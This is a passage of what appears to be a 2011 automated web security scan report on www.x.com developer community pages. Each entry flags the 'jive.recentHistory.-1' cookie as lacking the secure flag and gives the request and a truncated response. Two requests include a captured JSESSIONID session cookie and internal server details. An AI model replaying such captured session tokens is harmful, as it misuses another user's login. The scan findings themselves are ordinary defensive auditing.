Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.47. https://www.x.com/community/ppx/recurring_billing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.48. https://www.x.com/community/ppx/recurring_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.49. https://www.x.com/community/ppx/release_notes

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.50. https://www.x.com/community/ppx/sdks

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.51. https://www.x.com/community/ppx/showcase

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.52. https://www.x.com/community/ppx/showcase/ap_directory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.53. https://www.x.com/community/ppx/support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.54. https://www.x.com/community/ppx/system_status

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.55. https://www.x.com/community/ppx/testing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.56. https://www.x.com/community/ppx/training

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.57. https://www.x.com/community/ppx/transaction_information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.58. https://www.x.com/community/ppx/vt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.59. https://www.x.com/community/ppx/website_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.60. https://www.x.com/community/ppx/wpp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.61. https://www.x.com/community/ppx/wpphosted

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.62. https://www.x.com/community/ppx/wps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.63. https://www.x.com/community/ppx/xspaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.64. https://www.x.com/community/ppx/xspaces/accelerator

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.65. https://www.x.com/community/ppx/xspaces/certification

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.66. https://www.x.com/community/ppx/xspaces/cloud-computing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

